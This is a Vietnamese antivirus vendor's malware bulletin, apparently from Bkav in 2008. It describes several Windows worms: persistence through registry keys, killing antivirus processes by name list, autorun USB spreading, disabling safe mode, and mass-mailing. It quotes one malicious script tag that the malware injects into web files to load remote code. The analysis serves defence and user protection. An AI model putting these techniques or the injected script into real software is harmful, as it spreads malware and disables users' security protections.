Tắt các process và các cửa sổ có chứa 1 trong các xâu : peid , task view, telanjang, bugil, cewe, naked, porn, sex, alwil, wintask, folder option,worm, trojan, avira, windows script,
Trang 1 Sửa file hosts ngăn không cho người dùng truy
cập vào một vài trang web bảo mật
Sửa key không cho người dùng sử dụng một vài
tiện ích của windows và làm mất menu
FolderOptions
Tắt các process và các cửa sổ có chứa 1 trong
các xâu :
peid , task view, telanjang, bugil, cewe, naked, porn,
sex, alwil, wintask,
folder option,worm, trojan, avira, windows script,
commander, pc-media, killer, ertanto,
anti, ahnlab, nod32, hijack, sysinter, aladdin, panda,
trend, cillin,
mcaf, avast, bitdef, machine, movzx, kill, washer,
remove, wscript, diary,
untukmu, kangen, sstray, Alicia, Mariana, Dian, foto,
zlh, Anti, mspatch,
siti, virus, services.com, ctfmon, nopdb, opscan,
vptray, update, lexplorer, iexplorer,
nipsvc, njeeves, cclaw, nvcoas, aswupdsv, ashmaisv,
systray, riyani, xpshare, syslove,
tskmgr, ccapps, ash, avg, poproxy, mcv
Tìm các địa chỉ mail trong máy, đồng thời gửi
mail có đính kèm virus tới các địa chỉ vừa tìm được
Chuyên viên phân tích : Nguyễn Quốc Nhân
36 Bkav2009 (20/11/2008) cập nhật lần thứ 1:
LogoOneKA, MegabyA
Malware cập nhật mới nhất:
Nguy cơ:
Ăn cắp thông tin cá nhân
Lây file
Làm giảm mức độ bảo mật của hệ thống
Hiện tượng:
Sửa registry
Dừng các chương trình diệt virus
Làm chậm hệ thống
Mất icon của các file exe
Cách thức lây nhiễm:
Phát tán qua trang web, phần mềm miễn phí
Phát tán qua các tài nguyên chia sẻ mạng nội bộ
Cách phòng tránh:
Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại
Trang 2 Không nên mở file đính kèm không rõ nguồn
gốc, đặc biệt là các file có đuôi exe com pif và bat
Không nên share full các ổ đĩa, thư mục trong
mạng nội bộ, nên đặt password truy cập nếu muốn
chia sẻ quyền sửa và tạo file
Mô tả kỹ thuật:
Ghi giá trị
"load" = %WinDir%\uninstall\rundl132.exe
vào key
HKLM\Software\Microsoft\Windows\CurrentVersion
\Run để chạy virus mỗi khi windows được khởi động
Kiểm tra đã tồn tại key
[HKLM\SOFTWARE\Soft\DownloadWWW]
với giá trị "auto" = "1" làm dấu hiệu xác định xem
virus lây nhiễm chưa
Copy chính nó vào
%Windir%\ Logo1_.exe
%Windir%\uninstall\rundl132.exe
Drop ra file: %WinDir%\RichDll.dll
Ghi ngày lây nhiễm vào file C:\_desktop.ini
Lây file bằng cách ghi code virus vào trước file
gốc
Lây vào toàn bộ các file exe trong ổ cứng từ C
đến Y
Lây qua mạng nội bộ bằng cách copy và lây vào
các file exe trong các thư mục shared
Không lây những file đường dẫn có chứa:
• \Program Files\
• Common Files
• ComPlus Applications
• Documents and Settings
• InstallShield Installation Information
• Internet Explorer
• Messenger
• Microsoft Frontpage
• Microsoft Office
• Movie Maker
• MSN
• MSN Gaming Zone
• NetMeeting
• Outlook Express
• Recycled
• system
• System Volume Information
• system32
• windows
• Windows Media Player
• Windows NT
• WindowsUpdate
• winnt
Kill các services và chương trình diệt virus:
• "Kingsoft AntiVirus Service"
• EGHOST.EXE
Trang 3• IPARMOR.EXE
• KAVPFW.EXE
• MAILMON.EXE
• mcshield.exe
• RavMon.exe
• RavMonClass
• Ravmond.EXE
• regsvc.exe
Chuyên viên phân tích : Nguyễn Công Cường
Một số malware đáng chú ý cập nhật cùng ngày:
W32.ARPspoofT.Trojan, W32.FarfliKA.Rootkit,
W32.FialaKA.Worm, W32.MegabyA.Worm,
W32.VtLightIA.PE, W32.KxvoET.Worm,
W32.WinbetTT.Trojan, W32.AlureonB.Trojan,
W32.ArfuBot.Trojan, W32.CimusCD.Rootkit,
W32.MSFoxCB.Worm
37 Bkav2011 (21/11/2008) cập nhật lần thứ 1: Suchop,
MixaFQ
Malware cập nhật mới nhất:
Nguy cơ:
Làm giảm mức độ an ninh của hệ thống
Hiện tượng:
Sửa registry
Bị logoff máy tính khi sử dụng 1 vài tiện ích của windows như: TaskMgr, RegistryTool,
Không hiển thị được file ẩn và file hệ thống
Cách thức lây nhiễm:
Phát tán qua trang web
Tự động lây nhiễm vào USB
Cách phòng tránh:
Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại
Không nên mở ổ USB bằng cách nháy kép vào biểu tượng ổ đĩa
Mô tả kỹ thuật:
Ghi giá trị
"Userinit " = %SysDir%\systemio.exe vào key HKLM\ \CurrentVersion\Winlogon\
và Virus=%WinDir%\Mixa.exe Vào key HKLM\ \CurrentVersion\Run để virus được kích hoạt mỗi khi Windows khởi động
Trang 4 Copy bản thân thành các file :
%SysDir%\systemio.exe
%WinDir%\Mixa.exe
Liên tục check các process, nếu thấy process có
chứa 1 trong các xâu : taskmgr, procexp, regedit,
mmc thì đóng tất cả các ứng dụng và LogOff máy
tính
Copy bản thân thành file có tên "Mixa_I.exe"
kèm theo file autorun.inf vào tất cả các ổ đĩa
Liên tục ghi key làm người dùng không hiện
được các file ẩn và file hệ thống
Chuyên viên phân tích : Nguyễn Công Cường
Một số malware đáng chú ý cập nhật cùng ngày:
W32.ConthinA.Worm, W32.FialaKC.Worm,
W32.HtmInfectB.Trojan, W32.Suchop.PE,
W32.JvsoftLJ.Worm, W32.JvsoftLK.Worm,
W32.OngameFS.Trojan, W32.RsnetJZ.Trojan,
W32.Lin32.Trojan, W32.Sobicyt.Adware,
W32.Soxpeca.Adware,
38 Bkav2013 - Phát hành lần thứ 1 ngày 22/11/2008,
cập nhật DashferKA, VtLightKA, CkvoHGV,
ResycleB, Cmhot
Malware cập nhật mới nhất:
Nguy cơ:
Làm giảm mức độ an ninh của hệ thống
Hiện tượng:
Sửa registry
Không vào được chế độ safe mode của Windows
Xuất hiện popup các trang web tiếng Trung Quốc
Mất checkbox để hiển thị các file hệ thống
Cách thức lây nhiễm:
Phát tán qua trang web
Tự động lây nhiễm qua USB
Lây qua các file thực thi
Cách phòng tránh:
Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại
Không nên mở ổ USB bằng cách nháy kép vào biểu tượng ổ đĩa
Mô tả kỹ thuật:
Xóa các key :
Trang 5HKLM\ \Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\ \Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
làm cho máy tính không khởi động được trong chế độ
safemode
HKLM\Software\Microsoft\Windows\CurrentVersion
\Run
Copy bản thân thành file có tên "lsass.exe" vào
thư mục %SysDir%\Com, và ~.exe vào thư mục
Startup
để virus được thực thi khi khởi đông hệ thống
Tạo Mutex: CNJBlaipbofF để chỉ 1 file virus
chạy trên 1 máy
Dump ra các file :
%SysDir%\Com\smss.exe
%SysDir%\Com\netcfg.dll
%SysDir%\Com\netcfg.000
%SysDir%\Drivers\Alg.exe
Sửa key làm mất checkbox để hiển thị các file
hệ thống
Copy bản thân thành file có tên : "pagefile.pif"
kèm theo file autorun.inf vào tất cả các ổ đĩa
Tắt các process có chứa một trong các xâu sau :
rav, avp, twister, kv, watch, kissvc, scan, guard
Thêm vào cuối các file có đuôi: jsp, php, spx,
asp, tml, htm tìm thấy trên máy trừ ổ đĩa hệ thống (kể
cả trong các file nén rar) đoạn script :
<script src="http://js.k01[removed].com/01.asp"></script>
Lây nhiễm vào các file thực thi tìm được trong máy trừ ổ đĩa hệ thống
Chuyên viên phân tích : Nguyễn Ngọc Dũng